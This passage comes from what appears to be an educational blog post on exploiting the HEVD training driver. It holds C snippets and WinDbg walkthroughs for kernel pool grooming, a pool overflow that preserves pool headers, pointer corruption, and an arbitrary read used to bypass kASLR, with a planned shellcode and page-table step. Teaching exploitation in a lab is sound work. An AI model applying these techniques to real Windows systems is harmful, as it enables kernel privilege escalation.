This HelperObjectIo object is of type PARW_HELPER_OBJECT_IO, which is supplied by a user-mode client (us). This structure, which is supplied by us via DeviceIoControl, has its HelperObjectAddress member set to the address of the ARWHelperObject previously allocated in CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. This essentially means that our user-mode structure, which is sent to kernel mode, has one of its members, HelperObjectAddress to be specific, set to the address of a kernel-mode object, and that address is then bubbled back up to user mode. This is the end of the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function! Let's update our code to see how this looks dynamically. We can also set a breakpoint on HEVD!CreateArbitraryReadWriteHelperObjectNonPagedPoolNx in WinDbg. Note that the IOCTL to trigger CreateArbitraryReadWriteHelperObjectNonPagedPoolNx is 0x00222063.
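
A minimal sketch of the corresponding user-mode call is shown below, reusing the hHEVD handle from the earlier trigger sketch and the assumed ARW_HELPER_OBJECT_IO layout. The very first run shown in this post passed a Length of 0 (hence the zero Name Length debug print discussed below); a QWORD-sized Length is used here since the later set/get copies rely on it.

// Create a helper object and recover its kernel-mode address
ARW_HELPER_OBJECT_IO helperObjectIo = { 0 };
DWORD bytesReturned = 0;

// Size of the Name buffer the driver allocates; the driver's later copies use this length
// (the first debug run in this post used 0 here)
helperObjectIo.Length = sizeof(ULONG64);

DeviceIoControl(
    hHEVD,
    0x00222063,                                // CreateArbitraryReadWriteHelperObjectNonPagedPoolNx
    &helperObjectIo, sizeof(helperObjectIo),
    &helperObjectIo, sizeof(helperObjectIo),
    &bytesReturned, NULL);

// The driver writes the kernel address of the new helper object back into the structure
printf("[+] ARW_HELPER_OBJECT_NON_PAGED_POOL_NX: 0x%p\n", helperObjectIo.HelperObjectAddress);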

We know now that this function will allocate a pool chunk for the ARWHelperObject pointer, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let's set a breakpoint on the call to ExAllocatePoolWithTag responsible for this, and enable debug printing.

Also note the debug print Name Length is zero. This value was supplied by us from user mode, and since we initialized the buffer to zero, this is why the length is zero. The FreeIndex is also zero. We will touch on this value later on. After executing the memory allocation operation and inspecting the return value, we can see the familiar Hack pool tag, which is 0x10 bytes (16 bytes) + 0x10 bytes for the _POOL_HEADER structure - making this a total of 0x20 bytes. The address of this ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is 0xffff838b6e6d71b0.

We then know that another call to ExAllocatePoolWithTag will occur, which will allocate memory for the Name member of ARWHelperObject->Name, where ARWHelperObject is of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on this memory allocation operation and inspect the contents of the operation.

We can see this chunk is allocated in the same pool and kLFH bucket as the previous ARWHelperObject pointer. The address of this chunk, which is 0xffff838b6e6d73d0, will eventually be set as ARWHelperObject’s Name member, along with ARWHelperObject’s Length member being set to the original user mode input buffer’s Length member, which comes from an ARW_HELPER_OBJECT_IO structure.

From here we can press g in WinDbg to resume execution.

We can clearly see that the kernel-mode address of the ARWHelperObject pointer is bubbled back to user mode via the HelperObjectAddress of the ARW_HELPER_OBJECT_IO object specified in the input and output buffer parameters of the call to DeviceIoControl.

Let’s re-execute everything again and capture the output.

Notice anything? Each time we call CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, based on the analysis above, an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is always created. We know there is also an array of these objects, and the object created by each CreateArbitraryReadWriteHelperObjectNonPagedPoolNx call is assigned to the array at index FreeIndex. After re-running the updated code, we can see that by calling the function again, and therefore creating another object, the FreeIndex value was increased by one. Re-executing everything again for a second time, we can see this is the case again!

We know that this FreeIndex variable is set via a function call to the GetFreeIndex function, as seen below.

Length = HelperObjectIo->Length;

DbgPrint("[+] Name Length: 0x%X\n", Length);

//
// Get a free index
//

FreeIndex = GetFreeIndex();

if (FreeIndex == STATUS_INVALID_INDEX)
{
    //
    // Failed to get a free index
    //

    Status = STATUS_INVALID_INDEX;
    DbgPrint("[-] Unable to find FreeIndex: 0x%X\n", Status);

    return Status;
}

Let’s examine how this function is defined and executed. Taking a look in ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see the function is defined as such.

This function, which returns an integer value, performs a for loop based on MAX_OBJECT_COUNT to determine if the g_ARWHelperObjectNonPagedPoolNx array, which is an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, has a value assigned for a given index, starting at 0. For instance, the for loop first checks if the 0th element in the g_ARWHelperObjectNonPagedPoolNx array is assigned a value. If it is assigned, the index into the array is increased by one. This keeps occurring until the for loop can no longer find a value assigned to a given index. When this is the case, the current counter value is returned and assigned to the variable FreeIndex at the call site. This value is then used in the assignment operation that places the in-scope ARWHelperObject into the array managing all such objects. This loop occurs at most MAX_OBJECT_COUNT times, which is defined in ArbitraryReadWriteHelperNonPagedPoolNx.h as #define MAX_OBJECT_COUNT 65535. This is the total amount of objects that can be managed by the g_ARWHelperObjectNonPagedPoolNx array.
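
Based on that description, GetFreeIndex behaves roughly like the following (a reconstruction, not the verbatim HEVD source):

int GetFreeIndex(VOID)
{
    int FreeIndex = STATUS_INVALID_INDEX;

    for (int i = 0; i < MAX_OBJECT_COUNT; i++)
    {
        // Return the first slot in the global array that has not yet been assigned an object
        if (g_ARWHelperObjectNonPagedPoolNx[i] == NULL)
        {
            FreeIndex = i;
            break;
        }
    }

    return FreeIndex;
}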

The tl;dr of what happens in the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function is:

  1. Create an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, managed by the pointer ARWHelperObject
  2. Set the Name member of ARWHelperObject to a buffer on the NonPagedPoolNx, which is initialized to 0
  3. Set the Length member of ARWHelperObject to the value specified by the user-supplied input buffer via DeviceIoControl
  4. Assign this object to an array which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
  5. Return the address of the ARWHelperObject to user mode via the output buffer of DeviceIoControl

Here is a diagram of this in action.

Let’s take a look at the next IOCTL handler after CreateArbitraryReadWriteHelperObjectNonPagedPoolNx which is SetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler. This IOCTL handler will take the user buffer supplied by DeviceIoControl, which is expected to be of type ARW_HELPER_OBJECT_IO. This structure is then passed to the function SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, which is prototyped as such:

NTSTATUS
SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
)

Let's take a look at what this function will do with our input buffer. Recall that previously we were able to specify the length used to size the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object ARWHelperObject. Additionally, we were able to return the address of this pointer to user mode.

This function starts off by defining a few variables:

  1. A pointer named Name
  2. A pointer named HelperObjectAddress
  3. An integer value named Index which is assigned to the status STATUS_INVALID_INDEX
  4. An NTSTATUS code

After these values are declared, this function first checks to make sure the input buffer from user mode, the ARW_HELPER_OBJECT_IO pointer, is in user mode. After confirming this, the Name member (a pointer) from this user-mode buffer is stored into the pointer Name, previously declared in the listing of declared variables. The HelperObjectAddress member from the user-mode buffer, which after the call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx contained the kernel-mode address of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object ARWHelperObject, is extracted and stored into the HelperObjectAddress variable declared at the beginning of the function.

A call to GetIndexFromPointer is then made, with HelperObjectAddress as the argument. If the return value is STATUS_INVALID_INDEX, an NTSTATUS code of STATUS_INVALID_INDEX is returned to the caller. If the function returns anything else, the returned Index value is printed to the screen.

Where does this value come from? GetIndexFromPointer is defined as such.

This function will accept any pointer value, but realistically it is used for a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. This function takes the supplied pointer and indexes the array of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers, g_ARWHelperObjectNonPagedPoolNx. If the value hasn't been assigned to the array (e.g. if CreateArbitraryReadWriteHelperObjectNonPagedPoolNx wasn't called, as this will assign any created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX to the array, or the object was freed), STATUS_INVALID_INDEX is returned. This function basically makes sure the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is managed by the array. If it does exist, this function returns the index in the array where the given object resides.

Let's take a look at the next snippet of code from the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

After confirming the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX exists, a check is performed to ensure the Name pointer, which was extracted from the Name member of the user-mode PARW_HELPER_OBJECT_IO buffer, is in user mode. Note that g_ARWHelperObjectNonPagedPoolNx[Index] is being used in this situation as another way to reference the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, since g_ARWHelperObjectNonPagedPoolNx is, at the end of the day, an array of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers.

After confirming the buffer is coming from user mode, this function finishes by copying the value of Name, which is a value supplied by us via DeviceIoControl and the ARW_HELPER_OBJECT_IO object, to the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

Let's test this theory in WinDbg. What we should be looking for here is that the value specified by the Name member of our user-supplied ARW_HELPER_OBJECT_IO should be written to the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created in the previous call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Our updated code looks as follows.
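
The relevant addition looks roughly like the sketch below, continuing from the create call above (helperObjectIo and bytesReturned are reused). Note that Name is deliberately set to a raw value here, which is exactly what trips us up a little further down.

// Attempt to overwrite ARWHelperObject->Name with 0x4141414141414141
helperObjectIo.Name = (PVOID)0x4141414141414141;

DeviceIoControl(
    hHEVD,
    0x00222067,                                // SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx
    &helperObjectIo, sizeof(helperObjectIo),
    &helperObjectIo, sizeof(helperObjectIo),
    &bytesReturned, NULL);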

The above code should overwrite the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Note that the IOCTL for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x00222067.

We can then set a breakpoint in WinDbg to perform dynamic analysis.

Then we can set a breakpoint on ProbeForRead, which will take the first argument, which is our user-supplied ARW_HELPER_OBJECT_IO, and verify if it is in user mode. We can parse this memory address in WinDbg, which would be in RCX when the function call occurs due to the __fastcall calling convention, and see that this not only is a user-mode buffer, but it is also the object we intended to send from user mode for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

This HelperObjectAddress value is the address of the previously created/associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. We can also verify this in WinDbg.

Recall from earlier that the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object has its Length member taken from the Length sent from our user-mode ARW_HELPER_OBJECT_IO structure. The Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is also initialized to zero, per the RtlFillMemory call from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx routine - which initializes the Name buffer to 0 (recall the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is actually a buffer that was allocated via ExAllocatePoolWithTag by using the specified Length of our ARW_HELPER_OBJECT_IO structure in our DeviceIoControl call).

ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is the member that should be overwritten with the contents of the ARW_HELPER_OBJECT_IO object we sent from user mode, which currently is set to 0x4141414141414141. Knowing this, let’s set a breakpoint on the RtlCopyMemory routine, which will show up as memcpy in HEVD via WinDbg.

This fails. The error code here is actually access denied. Why is this? Recall that there is one final call to ProbeForRead directly before the memcpy call.

ProbeForRead(
    Name,
    g_ARWHelperObjectNonPagedPoolNx[Index]->Length,
    (ULONG)__alignof(UCHAR)
);

The Name variable here is extracted from the user-mode ARW_HELPER_OBJECT_IO buffer. Since we supplied a value of 0x4141414141414141, this technically isn't a valid address, and the call to ProbeForRead will not be able to locate it. Instead, let's create a user-mode pointer and leverage that!
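
A sketch of the fix is below: the user-mode pointer passed in Name now points at memory that actually holds the value we want copied into ARWHelperObject->Name.

// The value we want the driver to copy into the kernel-mode Name buffer
ULONG64 nameValue = 0x4141414141414141;

// Pass a valid user-mode address; ProbeForRead now succeeds and the driver's memcpy
// copies the contents of nameValue into the kernel-mode Name buffer
helperObjectIo.Name = (PVOID)&nameValue;

DeviceIoControl(
    hHEVD,
    0x00222067,                                // SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx
    &helperObjectIo, sizeof(helperObjectIo),
    &helperObjectIo, sizeof(helperObjectIo),
    &bytesReturned, NULL);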

After executing the code again and hitting all the breakpoints, we can see that execution now reaches the memcpy routine.

After executing the memcpy routine, the Name buffer of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created by the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function now contains the value specified by our user-mode buffer, 0x4141414141414141.

We are starting to get closer to our goal! You can see this is pretty much an uncontrolled arbitrary write primitive in and of itself. The issue here, however, is that the value we can overwrite, ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name, is a pointer allocated in the kernel via ExAllocatePoolWithTag. Since we cannot directly control the address stored in this member, we are limited to only overwriting what the kernel provides us. The goal for us will be to use the pool overflow vulnerability to overcome this (in the future).

Before getting to the exploitation phase, we need to investigate one more IOCTL handler, plus the IOCTL handler for deleting objects, which should not be time consuming.

The last IOCTL handler to investigate is the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler IOCTL handler.

This handler passes the user-supplied buffer, which is of type ARW_HELPER_OBJECT_IO to GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx. This function is identical to the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function, in that it will copy one Name member to another Name member, but in reverse order. As seen below, the Name member used in the destination argument for the call to RtlCopyMemory is from the user-supplied buffer this time.

This means that if we used the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function to overwrite the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function, then we could use GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx to retrieve the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object and bubble it back up to user mode. Let's modify our code to outline this. The IOCTL code to reach the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x0022206B.

In this case we do not need WinDbg to validate anything. We can simply set the contents of our ARW_HELPER_OBJECT_IO.Name member to junk as a POC that, after the IOCTL call to reach GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, this member will be overwritten by the contents of the associated/previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which will be 0x4141414141414141.
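
Continuing the same sketch, the get operation looks roughly like this; tempBuffer is the junk-filled user-mode pointer referenced below.

// User-mode buffer that should receive the contents of ARWHelperObject->Name
ULONG64 junk = 0x9090909090909090;      // Junk value, should be overwritten
PULONG64 tempBuffer = &junk;            // User-mode pointer handed to the driver

// This time Name is the destination of the driver's copy
helperObjectIo.Name = tempBuffer;

DeviceIoControl(
    hHEVD,
    0x0022206B,                                // GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx
    &helperObjectIo, sizeof(helperObjectIo),
    &helperObjectIo, sizeof(helperObjectIo),
    &bytesReturned, NULL);

printf("[+] tempBuffer: 0x%llx\n", *tempBuffer);   // Expected: 0x4141414141414141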

Since tempBuffer is assigned to ARW_HELPER_OBJECT_IO.Name, this is technically the value that will inherit the contents of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name in the memcpy operation from the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function. As we can see, we can successfully retrieve the contents of the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name object. Again, however, the issue is that we are not able to choose what ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name points to, as this is determined by the driver. We will use our pool overflow vulnerability soon to overcome this limitation.

The last IOCTL handler is the delete operation, found in DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler.

This IOCTL handler parses the input buffer from DeviceIoControl as an ARW_HELPER_OBJECT_IO structure. This buffer is then passed to the DeleteArbitraryReadWriteHelperObjecNonPagedPoolNx function.

This function is pretty simplistic - since HelperObjectAddress points to the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, this member is used in a call to ExFreePoolWithTag to free the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Additionally, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member, which is also allocated by ExAllocatePoolWithTag, is freed.

Now that we know all of the ins-and-outs of the driver's functionality, we can continue (please note that we are fortunate to have source code in this case - leveraging a disassembler may take a bit more time to come to the same conclusions).

Okay, Now Let’s Get Into Exploitation (For Real This Time)

We know that our situation currently allows for an uncontrolled arbitrary read/write primitive. This is because the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member is set currently to the address of a pool allocation via ExAllocatePoolWithTag. With our pool overflow we will try to overwrite this address to a meaningful address. This will allow for us to corrupt a controlled address - thus allowing us to obtain an arbitrary read/write primitive.

Our strategy for grooming the pool, due to all of these objects being the same size and being allocated on the same pool type (NonPagedPoolNx), will be as follows:

  1. “Fill the holes” in the current page servicing allocations of size 0x20
  2. Groom the pool to obtain the following layout: VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
  3. Leverage the read/write primitive to write our shellcode, one QWORD at a time, to KUSER_SHARED_DATA+0x800 and flip the no-eXecute bit to bypass kernel-mode DEP

Recall earlier the sentiment about needing to preserve _POOL_HEADER structures? This is where everything goes full circle for us. Recall from Part 1 that the kLFH still uses the legacy _POOL_HEADER structures to process and store metadata for pool chunks. This means there is no encoding going on, and it is possible to hardcode the header into the exploit so that when the pool overflow occurs, the header is overwritten with the same contents it held before.

Let’s inspect the value of a _POOL_HEADER of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we would be overflowing into.

Since this chunk is 16 bytes and will be part of the kLFH, it is prepended with a standard _POOL_HEADER structure. Since there is no encoding, we can simply hardcode the value of the _POOL_HEADER (recall that the _POOL_HEADER will be 0x10 bytes before the value returned by ExAllocatePoolWithTag). This means we can hardcode the value 0x6b63614802020000 into our exploit. At the time of the overflow into the next chunk - which should be one of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects we previously sprayed - the first 0x10 bytes overflowed into that chunk, its _POOL_HEADER, will be preserved and kept valid, bypassing the issue shown earlier when an invalid header occurs.
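As a quick breakdown of that hardcoded QWORD (a sketch against the legacy x64 _POOL_HEADER layout - verify the exact field semantics on your target build with dt nt!_POOL_HEADER):

// 0x6b63614802020000, viewed through the first 8 bytes of a legacy _POOL_HEADER:
//   PreviousSize = 0x00
//   PoolIndex    = 0x00
//   BlockSize    = 0x02        -> 0x02 * 0x10 = 0x20 bytes (0x10 header + 0x10 data)
//   PoolType     = 0x02
//   PoolTag      = 0x6b636148  -> "Hack" (HEVD's pool tag)
// The second 8 bytes of the 0x10-byte header are covered by the padding QWORD in our overflow buffer.
unsigned long long hardcodedHeader = 0x6b63614802020000;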

Knowing this, and knowing we have a bit of work to do, let’s rearrange our current exploit to make it more logical. We will create three functions for grooming:

  1. fillHoles()
  2. groomPool()
  3. pokeHoles()

These functions can be seen below.

fillHoles()

groomPool()

pokeHoles()

Please refer to Part 1 to understand what this is doing, but essentially this technique will fill any fragments in the corresponding kLFH bucket in the NonPagedPoolNx and force the memory manager to (theoretically) give us a new page to work with. We then fill this new page with objects we control, e.g. the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects.

Since we have a controlled pool-based overflow, the goal will be to overwrite any of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structures with the “vulnerable chunk” that copies memory into the allocation, without any bounds checking. Since the vulnerable chunk and the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX chunks are of the same size, they will both wind up being adjacent to each other theoretically, since they will land in the same kLFH bucket.

The last function, called readwritePrimitive() contains most of the exploit code.

The first bit of this function creates a “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via an ARW_HELPER_OBJECT_IO object, and performs the filling of the pool chunks, fills the new page with objects we control, and then frees every other one of these objects.

After freeing every other object, we then replace these freed slots with our vulnerable buffers. We also create a “standalone/main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Also note that the pool header is 16 bytes in size, meaning it is 2 QWORDS, hence “Padding”.

What we actually hope to do here is the following.

We want to use a controlled write to only overwrite the first member of this adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, Name. This is because we have additional primitives to control and return these values of the Name member as shown in this blog post. The issue we have had so far, however, is the address of the Name member of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is completely controlled by the driver and cannot be influenced by us, unless we leverage a vulnerability (a la pool overflow).

As shown in the readwritePrimitive() function, the goal here will be to corrupt the adjacent chunk(s) with the address of the "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we will manage via ARW_HELPER_OBJECT_IO.HelperObjectAddress. In other words, we would like a precise overflow that overwrites the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name value (currently set to 0x9090909090909090) with the address of our "main" object. Once we prove this is possible, we can then take this further to obtain the eventual read/write primitive.
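Here is a sketch of the overflow buffer we are about to use (this mirrors the vulnBuffer layout in readwritePrimitive() in the final listing):

// 0x28-byte input buffer handed to the pool overflow IOCTL:
unsigned long long vulnBuffer[5];
vulnBuffer[0] = 0x4141414141414141;   // fills the vulnerable chunk's own 0x10 bytes of data
vulnBuffer[1] = 0x4141414141414141;
vulnBuffer[2] = 0x6b63614802020000;   // replays the adjacent chunk's hardcoded _POOL_HEADER
vulnBuffer[3] = 0x4141414141414141;   // second half of the 0x10-byte header
vulnBuffer[4] = (unsigned long long)mainObject.HelperObjectAddress;   // lands on the adjacent object's Name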

Setting a breakpoint on the TriggerBufferOverflowNonPagedPoolNx routine in HEVD.sys, and setting an additional breakpoint on the memcpy routine, which performs the pool overflow, we can investigate the contents of the pool.

As seen in the above image, we can clearly see we have flooded the pool with controlled ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, as well as the “current” chunk - which refers to the vulnerable chunk used in the pool overflow. All of these chunks are prefaced with the Hack tag.

Then, after stepping through execution until the memcpy routine, we can inspect the contents of the next chunk, which is 0x10 bytes after the value in RCX, the destination of the memory copy operation. Remember - our goal is to overwrite the adjacent pool chunks. Stepping through the operation, we can clearly see that we have corrupted the next pool chunk, which is of type ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

We can validate that the address which was written out-of-bounds is actually the address of the “main”, standalone ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object we created.

Remember - a _POOL_HEADER structure is 0x10 bytes in length, which makes every pool chunk within this kLFH bucket 0x20 bytes in total size (0x10 bytes of header plus 0x10 bytes of data). Since we want to overflow into adjacent chunks, we need to preserve the adjacent chunk's pool header. Since we are in the kLFH, we can simply hardcode the pool header, as we have proven, to keep the pool satisfied and avoid any crashes that could arise from an invalid pool chunk. The destination address of the memory copy operation (the value in RCX) is the data area of the "vulnerable" chunk, which is only 0x10 bytes in size. The first 0x10 bytes of our copy therefore land inside the vulnerable chunk itself, and we do not care what they contain; the next 0x10 bytes, which are written out of bounds, land directly on top of the adjacent chunk's _POOL_HEADER, which is why we replay the hardcoded header at that offset in our buffer.

We have now successfully performed our out-of-bounds write via a pool overflow and corrupted an adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name member. That member is dynamically allocated in the pool beforehand at an address we do not control - but by leveraging a vulnerability such as this out-of-bounds write, we have replaced it with an address we do control: the address of the object created previously.

Arbitrary Read Primitive

Although it may not be totally apparent currently, our exploit strategy revolves around our ability to use our pool overflow to write out-of-bounds. Recall that the “Set” and “Get” capabilities in the driver allow us to read and write memory, but not at controlled locations. The location is controlled by the pool chunk allocated for the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

Let's take a look at the corrupted ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. The corrupted object is one of the many sprayed objects. We successfully overwrote the Name member of this object with the address of the "main", or standalone, ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object.

We know that it is possible to set the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structure via the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function through an IOCTL invocation. Since we are now able to control the value of Name in the corrupted object, let’s see if we can’t abuse this through an arbitrary read primitive.

Let’s break this down. We know that we currently have a corrupted object with a Name member that is set to the value of another object. For brevity, we can recall this from the previous image.

If we do a "Set" operation on the corrupted object, shown in the dt command with its Name member currently set to 0xffffa00ca378c210, the operation is performed on the Name member. However, we know that the Name member is actually set to the address of the "main" object via the out-of-bounds write! This means that performing a "Set" operation on the corrupted object will take the address of the main object stored in Name, dereference it, and write the contents specified by us. This will cause our main object to then point to whatever we specify, instead of the value of 0xffffa00ca378c3b0 currently outlined in the memory contents shown by dq in WinDbg. How does this turn into an arbitrary read primitive? Since our "main" object will point to whatever address we specify, the "Get" operation, if performed on the "main" object, will then dereference the address specified by us and return the value!

In WinDbg, we can “mimic” the “Set” operation as shown.

Performing the “Set” operation on the corrupted object will actually set the value of our main object to whatever is specified to the user, due to us corrupting the previous random address with the pool overflow vulnerability. At this point, performing the “Get” operation on our main object, since it was set to the value specified by the user, would dereference the value and return it to us!
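To summarize the flow, here is a hypothetical helper (the wrapper name and the corruptedObject/mainObject ARW_HELPER_OBJECT_IO globals are mine; the two IOCTL calls mirror the final exploit listing):

// Sketch of the arbitrary read primitive.
// Step 1: "set" on the corrupted groomed object - the driver dereferences its Name, which now
//         points at the main object, and writes 'where' into the main object's Name member.
// Step 2: "get" on the main object - the driver dereferences 'where' and copies the contents
//         back into our user-mode variable.
unsigned long long arbitraryRead64(HANDLE driverHandle, unsigned long long where)
{
    unsigned long long value = 0;
    DWORD bytesReturned = 0;

    corruptedObject.Name = &where;
    DeviceIoControl(driverHandle, 0x00222067, &corruptedObject, sizeof(corruptedObject),
                    NULL, 0, &bytesReturned, NULL);

    mainObject.Name = &value;
    DeviceIoControl(driverHandle, 0x0022206b, &mainObject, sizeof(mainObject),
                    &mainObject, sizeof(mainObject), &bytesReturned, NULL);

    return value;
}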

At this point we need to identify what our goal is. To comprehensively bypass kASLR, our goal is as follows:

  1. Use the base address of HEVD.sys from the original exploit in part one to provide the offset to the Import Address Table
  2. Supply an IAT entry that points to ntoskrnl.exe to the exploit to be arbitrarily read from (thus obtaining a pointer to ntoskrnl.exe)
  3. Calculate the distance from the pointer to the kernel to obtain the base

We can update our code to outline this. As you may recall, we have groomed the pool with 5000 ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects. However, we did not spray the pool with 5000 "vulnerable" objects. Since we have groomed the pool, we know that the vulnerable object we can arbitrarily write past will end up adjacent to one of the objects used for grooming. Since we only trigger the overflow once, and since we have already set the Name values of all the objects used for grooming to 0x9090909090909090, we can simply use the "Get" operation to view each Name member of the objects used for grooming. If one of the objects does not contain NOPs, this indicates that the pool overflow outlined previously, which corrupts the Name value of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX, has succeeded.
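A sketch of that scan (the same logic appears later in readwritePrimitive()):

// Ask the driver for each groomed object's Name contents; the one that no longer reads
// back as NOPs had its Name pointer corrupted by the pool overflow.
int corruptedIndex = -1;
unsigned long long placeholder;
DWORD bytesReturned = 0;

for (int i = 0; i < 5000; i++)
{
    placeholder = 0x9090909090909090;
    helperobjectArray[i].Name = &placeholder;

    DeviceIoControl(driverHandle, 0x0022206b, &helperobjectArray[i], sizeof(helperobjectArray[i]),
                    &helperobjectArray[i], sizeof(helperobjectArray[i]), &bytesReturned, NULL);

    if (placeholder != 0x9090909090909090)
    {
        corruptedIndex = i;
        break;
    }
}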

After this, we can use the "Set" functionality in HEVD on the corrupted object we just identified. This "tricks" the driver into dereferencing the corrupted Name member - which is actually the address of the "standalone"/main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX - and writing through it. Since we can later use the "Get" functionality on the main object, this gives us an arbitrary read primitive.

We then can add a “press enter to continue” function to our exploit to pause execution after the main object is printed to the screen, as well as the corrupted object used for grooming that resides within the 5000 objects used for grooming.

We then can take the address 0xffff8e03c8d5c2b0, which is the corrupted object, and inspect it in WinDbg. If all goes well, this address should contain the address of the “main” object.

Comparing the Name member to the previous screenshot in which the exploit with the “press enter to continue” statement is in, we can see that the pool corruption was successful and that the Name member of one of the 5000 objects used for grooming was overwritten!

Now, if we were to use the "Set" functionality of HEVD and supply the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object that was corrupted and also used for grooming, at address 0xffff8e03c8d5c2b0, HEVD would use the value stored in Name, dereference it, and overwrite it. This is because HEVD is expecting one of the pool allocations previously showcased for the Name pointers, which we do not control. Since we have supplied another address, what HEVD will actually do is perform the overwrite, but this time it will overwrite the pointer we supplied, which is another ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Since the first member of one of these objects is Name, HEVD will actually write whatever we supply to the Name member of our main object! Let's view this in WinDbg.

As our exploit showcased, we are using HEVD+0x2038 in this case. This value should be written to our main object.

As you can see, our main object now has its Name member pointing to HEVD+0x2038, which is a pointer to the kernel! After running the full exploit, we have now obtained the base address of HEVD from the previous exploit, and now the base of the kernel via an arbitrary read by way of pool overflow - all from low integrity!

The beauty of this technique of leveraging two objects should be clear now - we do not have to constantly perform overflows of objects in order to perform exploitation. We can now just simply use the main object to read!

Our exploitation technique will be to corrupt the page table entries of our eventual memory page our shellcode resides in. If you are not familiar with this technique, I have two blogs written on the subject, plus one about memory paging. You can find them here: one, two, and three.

For our purposes, we will need to arbitrarily read the following items:

